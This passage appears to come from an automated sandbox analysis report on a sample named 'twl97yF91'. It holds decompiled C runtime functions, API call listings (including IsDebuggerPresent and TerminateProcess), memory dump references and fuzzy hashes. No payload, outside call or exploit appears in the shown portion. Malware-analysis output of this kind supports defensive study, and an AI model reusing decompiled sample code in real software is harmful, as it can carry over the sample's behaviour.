                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                          				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          0x0040ea0f
                                                                                                                                                                                                          0x0040ea11
                                                                                                                                                                                                          0x0040ea13
                                                                                                                                                                                                          0x0040ea16
                                                                                                                                                                                                          0x0040ea1f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1597249276-0
                                                                                                                                                                                                          • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                          • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 454 2cb0920-2cb0929 TerminateProcess
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02CB0929
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 560597551-0
                                                                                                                                                                                                          • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                          • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 02CC395B
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02CC3970
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 02CC397B
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 02CC3997
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 02CC399E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction ID: 5b454e1f44dfc620a4a1794eb5f9110e0bf088dfb5e59747b9a67da5b99b9090
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD21C3B4A01204EFD720DF65F9496457FB0FB08356F904079E50D87662E7B86682CF4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                          				void* _v804;
                                                                                                                                                                                                          				intOrPtr _v808;
                                                                                                                                                                                                          				intOrPtr _v812;
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                          				long _t17;
                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                          				_t6 = __eax;
                                                                                                                                                                                                          				_t34 = _t22 -  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                          					asm("repe ret");
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x423b98 = _t6;
                                                                                                                                                                                                          				 *0x423b94 = _t22;
                                                                                                                                                                                                          				 *0x423b90 = _t25;
                                                                                                                                                                                                          				 *0x423b8c = _t21;
                                                                                                                                                                                                          				 *0x423b88 = _t27;
                                                                                                                                                                                                          				 *0x423b84 = _t26;
                                                                                                                                                                                                          				 *0x423bb0 = ss;
                                                                                                                                                                                                          				 *0x423ba4 = cs;
                                                                                                                                                                                                          				 *0x423b80 = ds;
                                                                                                                                                                                                          				 *0x423b7c = es;
                                                                                                                                                                                                          				 *0x423b78 = fs;
                                                                                                                                                                                                          				 *0x423b74 = gs;
                                                                                                                                                                                                          				asm("pushfd");
                                                                                                                                                                                                          				_pop( *0x423ba8);
                                                                                                                                                                                                          				 *0x423b9c =  *_t31;
                                                                                                                                                                                                          				 *0x423ba0 = _v0;
                                                                                                                                                                                                          				 *0x423bac =  &_a4;
                                                                                                                                                                                                          				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                          				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                          				 *0x423a9c = _t11;
                                                                                                                                                                                                          				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                          				 *0x423a94 = 1;
                                                                                                                                                                                                          				_t12 =  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				_v812 = _t12;
                                                                                                                                                                                                          				_t13 =  *0x422238; // 0x59e7d737
                                                                                                                                                                                                          				_v808 = _t13;
                                                                                                                                                                                                          				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				E004138FC(_t14);
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                          				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                          				if( *0x423ae0 == 0) {
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					E004138FC(_t17);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce09
                                                                                                                                                                                                          0x0040ce0f
                                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                                          0x0040ce11
                                                                                                                                                                                                          0x00413644
                                                                                                                                                                                                          0x00413649
                                                                                                                                                                                                          0x0041364f
                                                                                                                                                                                                          0x00413655
                                                                                                                                                                                                          0x0041365b
                                                                                                                                                                                                          0x00413661
                                                                                                                                                                                                          0x00413667
                                                                                                                                                                                                          0x0041366e
                                                                                                                                                                                                          0x00413675
                                                                                                                                                                                                          0x0041367c
                                                                                                                                                                                                          0x00413683
                                                                                                                                                                                                          0x0041368a
                                                                                                                                                                                                          0x00413691
                                                                                                                                                                                                          0x00413692
                                                                                                                                                                                                          0x0041369b
                                                                                                                                                                                                          0x004136a3
                                                                                                                                                                                                          0x004136ab
                                                                                                                                                                                                          0x004136b6
                                                                                                                                                                                                          0x004136c0
                                                                                                                                                                                                          0x004136c5
                                                                                                                                                                                                          0x004136ca
                                                                                                                                                                                                          0x004136d4
                                                                                                                                                                                                          0x004136de
                                                                                                                                                                                                          0x004136e3
                                                                                                                                                                                                          0x004136e9
                                                                                                                                                                                                          0x004136ee
                                                                                                                                                                                                          0x004136fa
                                                                                                                                                                                                          0x004136ff
                                                                                                                                                                                                          0x00413701
                                                                                                                                                                                                          0x00413709
                                                                                                                                                                                                          0x00413714
                                                                                                                                                                                                          0x00413721
                                                                                                                                                                                                          0x00413723
                                                                                                                                                                                                          0x00413725
                                                                                                                                                                                                          0x0041372a
                                                                                                                                                                                                          0x0041373e

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                          				intOrPtr* _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = __ecx;
                                                                                                                                                                                                          				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                          				 *__ecx = 0x41eff0;
                                                                                                                                                                                                          				if(_t5 != 0) {
                                                                                                                                                                                                          					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                          					_t5 = GetProcessHeap();
                                                                                                                                                                                                          					if(_t5 != 0) {
                                                                                                                                                                                                          						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t5;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x0040adb3
                                                                                                                                                                                                          0x0040adb5
                                                                                                                                                                                                          0x0040adb8
                                                                                                                                                                                                          0x0040adc0
                                                                                                                                                                                                          0x0040adc8
                                                                                                                                                                                                          0x0040adc8
                                                                                                                                                                                                          0x0040adce
                                                                                                                                                                                                          0x0040add0
                                                                                                                                                                                                          0x0040add8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040ade1
                                                                                                                                                                                                          0x0040add8
                                                                                                                                                                                                          0x0040ade8

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e40cc5b7fe0decf067d30f896caf04ab4924459579739271318f1b8fa1602008
                                                                                                                                                                                                          • Instruction ID: 894e8016728872cc9f7999b520d0c4e3fedff4379bfa81a67af3545e08d7bc0d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e40cc5b7fe0decf067d30f896caf04ab4924459579739271318f1b8fa1602008
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E41FEB4D11248CFDB10CFA9C985BDEFBF1BB09304F248029E859AB250DB749985CF85
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                          • Instruction ID: 602eeafb34d0e81df78247c899aa7f1ab8f685fe643c89ac3c5d791994df9735
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A276A106448FDF22CF74C805BEB33E9FFC6216F4545A5D90A97281E774A941CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                                                          				intOrPtr _t113;
                                                                                                                                                                                                          				short* _t115;
                                                                                                                                                                                                          				short* _t116;
                                                                                                                                                                                                          				char* _t120;
                                                                                                                                                                                                          				short* _t121;
                                                                                                                                                                                                          				short* _t123;
                                                                                                                                                                                                          				short* _t127;
                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                          				short* _t141;
                                                                                                                                                                                                          				signed int _t144;
                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                          				short* _t147;
                                                                                                                                                                                                          				signed int _t150;
                                                                                                                                                                                                          				short* _t153;
                                                                                                                                                                                                          				char* _t157;
                                                                                                                                                                                                          				int _t160;
                                                                                                                                                                                                          				long _t162;
                                                                                                                                                                                                          				signed int _t174;
                                                                                                                                                                                                          				signed int _t178;
                                                                                                                                                                                                          				signed int _t179;
                                                                                                                                                                                                          				int _t182;
                                                                                                                                                                                                          				short* _t184;
                                                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                                                          				short* _t189;
                                                                                                                                                                                                          				int _t191;
                                                                                                                                                                                                          				intOrPtr _t194;
                                                                                                                                                                                                          				int _t207;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t110 =  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                          				_t184 = __ecx;
                                                                                                                                                                                                          				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                          				if(_t194 == 0) {
                                                                                                                                                                                                          					_t182 = 1;
                                                                                                                                                                                                          					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                          						_t162 = GetLastError();
                                                                                                                                                                                                          						__eflags = _t162 - 0x78;
                                                                                                                                                                                                          						if(_t162 == 0x78) {
                                                                                                                                                                                                          							 *0x423e7c = 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *0x423e7c = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a16 <= 0) {
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                          					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                          							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _a28;
                                                                                                                                                                                                          						if(_a28 == 0) {
                                                                                                                                                                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                          						_v24 = _t113;
                                                                                                                                                                                                          						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                          						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                          							__eflags = _t113 - _a28;
                                                                                                                                                                                                          							if(_t113 == _a28) {
                                                                                                                                                                                                          								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                          								L78:
                                                                                                                                                                                                          								__eflags = _v16;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									_push(_v16);
                                                                                                                                                                                                          									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t115 = _v20;
                                                                                                                                                                                                          								__eflags = _t115;
                                                                                                                                                                                                          								if(_t115 != 0) {
                                                                                                                                                                                                          									__eflags = _a20 - _t115;
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										_push(_t115);
                                                                                                                                                                                                          										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t116 = _t184;
                                                                                                                                                                                                          								goto L84;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                          							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                          							_v16 = _t120;
                                                                                                                                                                                                          							__eflags = _t120;
                                                                                                                                                                                                          							if(_t120 == 0) {
                                                                                                                                                                                                          								goto L58;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                          							_v12 = _t121;
                                                                                                                                                                                                          							__eflags = _t121;
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									L71:
                                                                                                                                                                                                          									_t182 = 0;
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          									L72:
                                                                                                                                                                                                          									__eflags = _t182;
                                                                                                                                                                                                          									if(_t182 == 0) {
                                                                                                                                                                                                          										goto L62;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                          									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                          									_v12 = _t123;
                                                                                                                                                                                                          									__eflags = _t123;
                                                                                                                                                                                                          									if(_t123 != 0) {
                                                                                                                                                                                                          										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                          										_v20 = _t186;
                                                                                                                                                                                                          										asm("sbb esi, esi");
                                                                                                                                                                                                          										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                          										__eflags = _t184;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t184 = 0;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									E004147AE(_t182);
                                                                                                                                                                                                          									goto L78;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                          								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                          									goto L71;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t127 =  &(_t121[4]);
                                                                                                                                                                                                          								__eflags = _t127 - 0x400;
                                                                                                                                                                                                          								if(_t127 > 0x400) {
                                                                                                                                                                                                          									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                          									__eflags = _t128;
                                                                                                                                                                                                          									if(_t128 != 0) {
                                                                                                                                                                                                          										 *_t128 = 0xdddd;
                                                                                                                                                                                                          										_t128 = _t128 + 8;
                                                                                                                                                                                                          										__eflags = _t128;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t182 = _t128;
                                                                                                                                                                                                          									goto L72;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E0040CFB0(_t127);
                                                                                                                                                                                                          								_t182 = _t191;
                                                                                                                                                                                                          								__eflags = _t182;
                                                                                                                                                                                                          								if(_t182 == 0) {
                                                                                                                                                                                                          									goto L62;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *_t182 = 0xcccc;
                                                                                                                                                                                                          								_t182 = _t182 + 8;
                                                                                                                                                                                                          								goto L72;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L62:
                                                                                                                                                                                                          							_t184 = 0;
                                                                                                                                                                                                          							goto L78;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							goto L58;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t112 != 1) {
                                                                                                                                                                                                          							L58:
                                                                                                                                                                                                          							_t116 = 0;
                                                                                                                                                                                                          							L84:
                                                                                                                                                                                                          							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                          						if(_a28 == 0) {
                                                                                                                                                                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                          						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                          						_t207 = _t182;
                                                                                                                                                                                                          						if(_t207 == 0) {
                                                                                                                                                                                                          							goto L58;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(_t207 <= 0) {
                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                          								_v16 = 0;
                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                          								if(_v16 == 0) {
                                                                                                                                                                                                          									goto L58;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                          									L52:
                                                                                                                                                                                                          									E004147AE(_v16);
                                                                                                                                                                                                          									_t116 = _v12;
                                                                                                                                                                                                          									goto L84;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t184 = LCMapStringW;
                                                                                                                                                                                                          								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                          								_v12 = _t174;
                                                                                                                                                                                                          								if(_t174 == 0) {
                                                                                                                                                                                                          									goto L52;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                          									__eflags = _t174;
                                                                                                                                                                                                          									if(_t174 <= 0) {
                                                                                                                                                                                                          										L44:
                                                                                                                                                                                                          										_t184 = 0;
                                                                                                                                                                                                          										__eflags = 0;
